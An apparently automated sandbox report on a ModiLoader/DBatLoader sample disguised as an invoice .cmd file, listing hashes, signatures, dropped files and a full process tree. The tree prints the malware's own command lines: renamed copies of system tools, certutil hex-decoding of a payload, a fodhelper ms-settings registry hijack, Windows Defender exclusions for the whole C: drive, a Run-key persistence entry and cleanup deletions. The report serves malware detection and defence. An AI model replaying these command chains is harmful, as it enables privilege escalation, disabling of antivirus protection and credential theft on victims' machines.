Analysis
-
max time kernel
141s -
max time network
130s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
07-06-2024 05:19
Static task
static1
Behavioral task
behavioral1
Sample
INV200495000-PAY ORDER0940584.cmd
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
INV200495000-PAY ORDER0940584.cmd
Resource
win10v2004-20240508-en
General
-
Target
INV200495000-PAY ORDER0940584.cmd
-
Size
3.0MB
-
MD5
ba6011bbbcee0c141db0c45b8219a275
-
SHA1
e8fe383f4b6614b70fe9902618660aad3199bb62
-
SHA256
a7d331358f0530d1b5780f18ded9587256f16a675b1f440ebb73c92979d9719b
-
SHA512
3b1145ff9512fc0d7e3dcbae431cd3424e12721c17a4be043ca2b4ddd7ab4db5f9670ea07e75eedfad8d928b9fe08ca2412d062375b1df25e9ed31aa25fdfadf
-
SSDEEP
49152:MmZIVekHAYmaBfa2cLySXFDvh13zo//zhK6x3UGZJyFxCknVgGlL1+I0bHdFE4Kh:7
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
ModiLoader Second Stage 2 IoCs
Processes:
resource yara_rule behavioral2/memory/3188-119-0x0000000000400000-0x0000000001400000-memory.dmp modiloader_stage2 behavioral2/memory/3188-122-0x0000000000400000-0x0000000001400000-memory.dmp modiloader_stage2 -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
per.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation per.exe -
Executes dropped EXE 29 IoCs
Processes:
alpha.exealpha.exealpha.exealpha.exekn.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exeger.exealpha.exekn.exeper.exealpha.exePing_c.pifalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.execmd.pifalpha.exealpha.exegeklllgC.pifpid process 2384 alpha.exe 4724 alpha.exe 2100 alpha.exe 3640 alpha.exe 1852 kn.exe 4684 alpha.exe 2460 alpha.exe 3984 alpha.exe 3928 alpha.exe 988 xkn.exe 4972 alpha.exe 1244 ger.exe 2176 alpha.exe 220 kn.exe 2992 per.exe 3508 alpha.exe 4960 Ping_c.pif 1280 alpha.exe 3124 alpha.exe 4796 alpha.exe 3812 alpha.exe 1388 alpha.exe 3628 alpha.exe 3928 alpha.exe 940 alpha.exe 748 cmd.pif 4968 alpha.exe 2876 alpha.exe 3188 geklllgC.pif -
Loads dropped DLL 1 IoCs
Processes:
cmd.pifpid process 748 cmd.pif -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Ping_c.pifdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cglllkeg = "C:\\Users\\Public\\Cglllkeg.url" Ping_c.pif -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 43 api.ipify.org 44 api.ipify.org -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Ping_c.pifdescription pid process target process PID 4960 set thread context of 3188 4960 Ping_c.pif geklllgC.pif -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 4868 taskkill.exe -
Modifies registry class 5 IoCs
Processes:
ger.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\ms-settings\shell\open\command ger.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\ms-settings ger.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\ms-settings\shell ger.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\ms-settings\shell\open ger.exe Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" ger.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 38 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 40 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
xkn.exepowershell.exegeklllgC.pifpid process 988 xkn.exe 988 xkn.exe 988 xkn.exe 940 powershell.exe 940 powershell.exe 940 powershell.exe 3188 geklllgC.pif 3188 geklllgC.pif 3188 geklllgC.pif -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
xkn.exetaskkill.exepowershell.exegeklllgC.pifdescription pid process Token: SeDebugPrivilege 988 xkn.exe Token: SeDebugPrivilege 4868 taskkill.exe Token: SeDebugPrivilege 940 powershell.exe Token: SeDebugPrivilege 3188 geklllgC.pif -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exePing_c.pifdescription pid process target process PID 4632 wrote to memory of 1296 4632 cmd.exe extrac32.exe PID 4632 wrote to memory of 1296 4632 cmd.exe extrac32.exe PID 4632 wrote to memory of 2384 4632 cmd.exe alpha.exe PID 4632 wrote to memory of 2384 4632 cmd.exe alpha.exe PID 4632 wrote to memory of 4724 4632 cmd.exe alpha.exe PID 4632 wrote to memory of 4724 4632 cmd.exe alpha.exe PID 4632 wrote to memory of 2100 4632 cmd.exe alpha.exe PID 4632 wrote to memory of 2100 4632 cmd.exe alpha.exe PID 2100 wrote to memory of 3204 2100 alpha.exe extrac32.exe PID 2100 wrote to memory of 3204 2100 alpha.exe extrac32.exe PID 4632 wrote to memory of 3640 4632 cmd.exe alpha.exe PID 4632 wrote to memory of 3640 4632 cmd.exe alpha.exe PID 3640 wrote to memory of 1852 3640 alpha.exe kn.exe PID 3640 wrote to memory of 1852 3640 alpha.exe kn.exe PID 4632 wrote to memory of 4684 4632 cmd.exe alpha.exe PID 4632 wrote to memory of 4684 4632 cmd.exe alpha.exe PID 4684 wrote to memory of 964 4684 alpha.exe extrac32.exe PID 4684 wrote to memory of 964 4684 alpha.exe extrac32.exe PID 4632 wrote to memory of 2460 4632 cmd.exe alpha.exe PID 4632 wrote to memory of 2460 4632 cmd.exe alpha.exe PID 2460 wrote to memory of 4700 2460 alpha.exe extrac32.exe PID 2460 wrote to memory of 4700 2460 alpha.exe extrac32.exe PID 4632 wrote to memory of 3984 4632 cmd.exe alpha.exe PID 4632 wrote to memory of 3984 4632 cmd.exe alpha.exe PID 3984 wrote to memory of 5052 3984 alpha.exe extrac32.exe PID 3984 wrote to memory of 5052 3984 alpha.exe extrac32.exe PID 4632 wrote to memory of 3928 4632 cmd.exe alpha.exe PID 4632 wrote to memory of 3928 4632 cmd.exe alpha.exe PID 3928 wrote to memory of 988 3928 alpha.exe xkn.exe PID 3928 wrote to memory of 988 3928 alpha.exe xkn.exe PID 988 wrote to memory of 4972 988 xkn.exe alpha.exe PID 988 wrote to memory of 4972 988 xkn.exe alpha.exe PID 4972 wrote to memory of 1244 4972 alpha.exe ger.exe PID 4972 wrote to memory of 1244 4972 alpha.exe ger.exe PID 4632 wrote to memory of 2176 4632 cmd.exe alpha.exe PID 4632 wrote to memory of 2176 4632 cmd.exe alpha.exe PID 2176 wrote to memory of 220 2176 alpha.exe kn.exe PID 2176 wrote to memory of 220 2176 alpha.exe kn.exe PID 4632 wrote to memory of 2992 4632 cmd.exe per.exe PID 4632 wrote to memory of 2992 4632 cmd.exe per.exe PID 4632 wrote to memory of 3508 4632 cmd.exe alpha.exe PID 4632 wrote to memory of 3508 4632 cmd.exe alpha.exe PID 3508 wrote to memory of 4868 3508 alpha.exe taskkill.exe PID 3508 wrote to memory of 4868 3508 alpha.exe taskkill.exe PID 4632 wrote to memory of 4960 4632 cmd.exe Ping_c.pif PID 4632 wrote to memory of 4960 4632 cmd.exe Ping_c.pif PID 4632 wrote to memory of 4960 4632 cmd.exe Ping_c.pif PID 4632 wrote to memory of 1280 4632 cmd.exe alpha.exe PID 4632 wrote to memory of 1280 4632 cmd.exe alpha.exe PID 4632 wrote to memory of 3124 4632 cmd.exe alpha.exe PID 4632 wrote to memory of 3124 4632 cmd.exe alpha.exe PID 4632 wrote to memory of 4796 4632 cmd.exe alpha.exe PID 4632 wrote to memory of 4796 4632 cmd.exe alpha.exe PID 4632 wrote to memory of 3812 4632 cmd.exe alpha.exe PID 4632 wrote to memory of 3812 4632 cmd.exe alpha.exe PID 4632 wrote to memory of 1388 4632 cmd.exe alpha.exe PID 4632 wrote to memory of 1388 4632 cmd.exe alpha.exe PID 4632 wrote to memory of 3628 4632 cmd.exe alpha.exe PID 4632 wrote to memory of 3628 4632 cmd.exe alpha.exe PID 4632 wrote to memory of 3928 4632 cmd.exe alpha.exe PID 4632 wrote to memory of 3928 4632 cmd.exe alpha.exe PID 4632 wrote to memory of 940 4632 cmd.exe alpha.exe PID 4632 wrote to memory of 940 4632 cmd.exe alpha.exe PID 4960 wrote to memory of 1296 4960 Ping_c.pif cmd.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\INV200495000-PAY ORDER0940584.cmd"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"2⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\INV200495000-PAY ORDER0940584.cmd" "C:\\Users\\Public\\Ping_c.mp4" 92⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\INV200495000-PAY ORDER0940584.cmd" "C:\\Users\\Public\\Ping_c.mp4" 93⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"3⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\xkn.exeC:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\alpha.exe"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\ger.exeC:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""5⤵
- Executes dropped EXE
- Modifies registry class
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 122⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 123⤵
- Executes dropped EXE
-
C:\Windows \System32\per.exe"C:\\Windows \\System32\\per.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\Libraries\Ping_c.pifC:\Users\Public\Libraries\Ping_c.pif2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\geklllgC.cmd""3⤵
-
C:\Windows\SysWOW64\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"4⤵
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\Cglllkeg.bat""3⤵
-
C:\Windows \System32\cmd.pif"C:\Windows \System32\cmd.pif"4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SYSTEM32\cmd.execmd /c start /min powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:'5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\cmd.pif"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\extrac32.exeC:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Ping_c.pif C:\\Users\\Public\\Libraries\\Cglllkeg.PIF3⤵
-
C:\Users\Public\Libraries\geklllgC.pifC:\Users\Public\Libraries\geklllgC.pif3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c rmdir "C:\Windows \"2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
-
C:\Windows\system32\SystemSettingsAdminFlows.exe"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3244,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=3580 /prefetch:81⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xdiu34xr.wx0.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Public\Libraries\Cglllkeg.batFilesize
23KB
MD5997f3d1af6cf88547c7fe0cdf516ac0c
SHA1d9bb666d58d8f33d82d6787f89bb4f21057c8965
SHA25672c98a4c731ca55cceac4da6af62b6d9923282b5d8d07c6b920594bb85be2499
SHA512e64d178552b5baf83449ae1631c62becd66729af8faedf612128ed3a2020b0e72ca1b424823f8e105ff79c364b488b06cca55023efac2965a1d0832dccfc16b9
-
C:\Users\Public\Libraries\Ping_c.pifFilesize
1.1MB
MD5cf0406a9f208a43a3a3eccf1769f55d5
SHA17a8d7bde7f7ffacbda4847f354d62e311312f071
SHA2568bd6792495e882b3f5604fc9cf7fdc1357d38c5297593951bb26aa9309765df8
SHA512ae35345f9a0d00de0f147056ad8f8c700eca6860ac869c28f6b71ef70f71bee96f8efeb5e2d7d8a75eee2aafeac34124ff5acc947c608478ee478332d9130b00
-
C:\Users\Public\Libraries\geklllgC.cmdFilesize
13KB
MD5ecac4200f2c6ab06102f8fe7b14a96af
SHA182e148655bfe410f80cafb070713259e94ec00cb
SHA256067cd486f7b1a9b7ca52a6d2ab25fdd443f839485e4787a768f9c6654e003271
SHA512d6c271a9bd0a2ab68ae3270bfca920049a86e8ad4aa66ce9c376a88f02de041a8bf7b24b757aac2f67042c38ff01f4b6f615cd1d1b76fe25974d7ffeb03ba348
-
C:\Users\Public\Libraries\geklllgC.pifFilesize
66KB
MD5c116d3604ceafe7057d77ff27552c215
SHA1452b14432fb5758b46f2897aeccd89f7c82a727d
SHA2567bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301
SHA5129202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6
-
C:\Users\Public\Ping_c.mp4Filesize
2.2MB
MD5d7e89c5831e8bcb061122aa646bf5815
SHA1d98375cc44cdb2662fafc4db36674833347a7ef7
SHA256f6ed12b8c9298e89a282c473e2022c477116da4aee339e27569eb15368bf2076
SHA512b497f8971be6958f0868d9c9ea68ade02e1ff18506360af5eda2ba87ac32a510fdb7dfd41701b1d894ec5901232fc3abe74ab2ff5fb0ba821936dde1b6914054
-
C:\Users\Public\alpha.exeFilesize
283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
C:\Users\Public\alpha.exeFilesize
231KB
MD5d0fce3afa6aa1d58ce9fa336cc2b675b
SHA14048488de6ba4bfef9edf103755519f1f762668f
SHA2564d89fc34d5f0f9babd022271c585a9477bf41e834e46b991deaa0530fdb25e22
SHA51280e127ef81752cd50f9ea2d662dc4d3bf8db8d29680e75fa5fc406ca22cafa5c4d89ef2eac65b486413d3cdd57a2c12a1cb75f65d1e312a717d262265736d1c2
-
C:\Users\Public\ger.exeFilesize
75KB
MD5227f63e1d9008b36bdbcc4b397780be4
SHA1c0db341defa8ef40c03ed769a9001d600e0f4dae
SHA256c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d
SHA512101907b994d828c83587c483b4984f36caf728b766cb7a417b549852a6207e2a3fe9edc8eff5eeab13e32c4cf1417a3adccc089023114ea81974c5e6b355fed9
-
C:\Users\Public\kn.exeFilesize
1.6MB
MD5bd8d9943a9b1def98eb83e0fa48796c2
SHA170e89852f023ab7cde0173eda1208dbb580f1e4f
SHA2568de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2
SHA51295630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b
-
C:\Users\Public\xkn.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
C:\Windows \System32\cmd.pifFilesize
94KB
MD5869640d0a3f838694ab4dfea9e2f544d
SHA1bdc42b280446ba53624ff23f314aadb861566832
SHA2560db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323
SHA5126e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7
-
C:\Windows \System32\netutils.dllFilesize
109KB
MD53ef9e89c8bf16295c84b8c82bf5e1b50
SHA145fb8e0cd06da23564712614481265679369fee3
SHA256e0d3d0cf79d7969da536946de8a7395cab39ddfaca7ba7353aa6544d04209b2e
SHA5120d27d4fe85117003830b69575ea02b7ee67601db7d8b2e422f5f9b72735b9b3d15ab8b81b7a9f4f2b14caf1365d0137d9d437932c4640f97c883d3c7bf24a1c1
-
C:\Windows \System32\per.exeFilesize
48KB
MD585018be1fd913656bc9ff541f017eacd
SHA126d7407931b713e0f0fa8b872feecdb3cf49065a
SHA256c546e05d705ffdd5e1e18d40e2e7397f186a7c47fa5fc21f234222d057227cf5
SHA5123e5903cf18386951c015ae23dd68a112b2f4b0968212323218c49f8413b6d508283cc6aaa929dbead853bd100adc18bf497479963dad42dfafbeb081c9035459
-
memory/748-89-0x00000000613C0000-0x00000000613E2000-memory.dmpFilesize
136KB
-
memory/988-36-0x000001F368300000-0x000001F368322000-memory.dmpFilesize
136KB
-
memory/3188-182-0x00000000403E0000-0x0000000040434000-memory.dmpFilesize
336KB
-
memory/3188-136-0x00000000403E0000-0x0000000040434000-memory.dmpFilesize
336KB
-
memory/3188-122-0x0000000000400000-0x0000000001400000-memory.dmpFilesize
16.0MB
-
memory/3188-123-0x0000000040300000-0x000000004035C000-memory.dmpFilesize
368KB
-
memory/3188-125-0x0000000040480000-0x0000000040A24000-memory.dmpFilesize
5.6MB
-
memory/3188-126-0x00000000403E0000-0x000000004043A000-memory.dmpFilesize
360KB
-
memory/3188-130-0x00000000403E0000-0x0000000040434000-memory.dmpFilesize
336KB
-
memory/3188-128-0x00000000403E0000-0x0000000040434000-memory.dmpFilesize
336KB
-
memory/3188-127-0x00000000403E0000-0x0000000040434000-memory.dmpFilesize
336KB
-
memory/3188-146-0x00000000403E0000-0x0000000040434000-memory.dmpFilesize
336KB
-
memory/3188-184-0x00000000403E0000-0x0000000040434000-memory.dmpFilesize
336KB
-
memory/3188-1183-0x0000000041EE0000-0x0000000041EEA000-memory.dmpFilesize
40KB
-
memory/3188-180-0x00000000403E0000-0x0000000040434000-memory.dmpFilesize
336KB
-
memory/3188-178-0x00000000403E0000-0x0000000040434000-memory.dmpFilesize
336KB
-
memory/3188-176-0x00000000403E0000-0x0000000040434000-memory.dmpFilesize
336KB
-
memory/3188-174-0x00000000403E0000-0x0000000040434000-memory.dmpFilesize
336KB
-
memory/3188-172-0x00000000403E0000-0x0000000040434000-memory.dmpFilesize
336KB
-
memory/3188-170-0x00000000403E0000-0x0000000040434000-memory.dmpFilesize
336KB
-
memory/3188-166-0x00000000403E0000-0x0000000040434000-memory.dmpFilesize
336KB
-
memory/3188-164-0x00000000403E0000-0x0000000040434000-memory.dmpFilesize
336KB
-
memory/3188-162-0x00000000403E0000-0x0000000040434000-memory.dmpFilesize
336KB
-
memory/3188-160-0x00000000403E0000-0x0000000040434000-memory.dmpFilesize
336KB
-
memory/3188-158-0x00000000403E0000-0x0000000040434000-memory.dmpFilesize
336KB
-
memory/3188-156-0x00000000403E0000-0x0000000040434000-memory.dmpFilesize
336KB
-
memory/3188-154-0x00000000403E0000-0x0000000040434000-memory.dmpFilesize
336KB
-
memory/3188-152-0x00000000403E0000-0x0000000040434000-memory.dmpFilesize
336KB
-
memory/3188-148-0x00000000403E0000-0x0000000040434000-memory.dmpFilesize
336KB
-
memory/3188-144-0x00000000403E0000-0x0000000040434000-memory.dmpFilesize
336KB
-
memory/3188-142-0x00000000403E0000-0x0000000040434000-memory.dmpFilesize
336KB
-
memory/3188-140-0x00000000403E0000-0x0000000040434000-memory.dmpFilesize
336KB
-
memory/3188-138-0x00000000403E0000-0x0000000040434000-memory.dmpFilesize
336KB
-
memory/3188-119-0x0000000000400000-0x0000000001400000-memory.dmpFilesize
16.0MB
-
memory/3188-134-0x00000000403E0000-0x0000000040434000-memory.dmpFilesize
336KB
-
memory/3188-132-0x00000000403E0000-0x0000000040434000-memory.dmpFilesize
336KB
-
memory/3188-168-0x00000000403E0000-0x0000000040434000-memory.dmpFilesize
336KB
-
memory/3188-150-0x00000000403E0000-0x0000000040434000-memory.dmpFilesize
336KB
-
memory/3188-1179-0x0000000040B40000-0x0000000040BA6000-memory.dmpFilesize
408KB
-
memory/3188-1180-0x0000000041B40000-0x0000000041B90000-memory.dmpFilesize
320KB
-
memory/3188-1181-0x0000000041B90000-0x0000000041C2C000-memory.dmpFilesize
624KB
-
memory/3188-1182-0x0000000041CC0000-0x0000000041D52000-memory.dmpFilesize
584KB
-
memory/4960-75-0x0000000000400000-0x0000000000522000-memory.dmpFilesize
1.1MB